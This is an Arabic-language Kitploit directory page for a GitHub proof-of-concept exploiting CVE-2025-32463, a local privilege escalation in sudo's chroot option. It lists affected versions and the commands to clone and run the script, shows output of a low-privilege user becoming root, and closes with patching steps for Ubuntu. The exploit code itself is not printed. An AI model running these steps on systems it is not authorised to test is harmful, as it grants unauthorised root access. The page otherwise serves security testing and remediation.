Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32463 — # CVE-2025-32463 – استغلال رفع الامتيازات في Sudo (إثبات المفهوم) مع ملف .so مُجمَّع مسبقاً | Kitploit
أدوات/GitHubGitHub/zinzloun/cve-2025-32463
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليم
GitHubzinzloun/cve-2025-32463

CVE-2025-32463

# CVE-2025-32463 – استغلال رفع الامتيازات في Sudo (إثبات المفهوم) مع ملف .so مُجمَّع مسبقاً

عرض المستودع
147منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32463 – استغلال تصعيد الامتيازات في Sudo (إثبات المفهوم) مع مكتبة مسبقة التجميع

يحتوي هذا المستودع على استغلال إثبات المفهوم لـ CVE-2025-32463، وهي ثغرة تصعيد الامتيازات المحلية في sudo اكتشفها ريتش ميرش.

الإسناد

https://github.com/kh4sh3i/CVE-2025-32463

⚠️ إخلاء المسؤولية

هذا الاستغلال (PoC) هو لأغراض تعليمية واختبارية مصرح بها فقط. لا تستخدم هذا الكود على أنظمة لا تملكها أو ليس لديك إذن صريح بتقييمها.


🔧 المتطلبات

  • sudo مع دعم chroot (-R): الإصدار 1.9.14 إلى 1.9.17
  • nsswitch مفعل

🚀 كيفية تشغيل POC

root@kitploit:~
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463

تحقق مما إذا كان المستخدم الحالي لديه صلاحيات منخفضة

root@kitploit:~
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)

تحقق من المتطلبات

root@kitploit:~
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf

تشغيل الاستغلال

root@kitploit:~
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

🚒 الإصلاح على Ubuntu 24.04 LTS

  • للأنظمة المتصلة فقط قم بتشغيل

    root@kitploit:~
    sudo apt update && sudo apt upgrade
    
  • للأنظمة المعزولة عن الشبكة: يمكنك الحصول على أحدث حزمة sudo من هنا: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. بعد نقل الحزمة إلى النظام المستهدف، قم بتشغيل:

    root@kitploit:~
     sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
    
تنزيل الأداة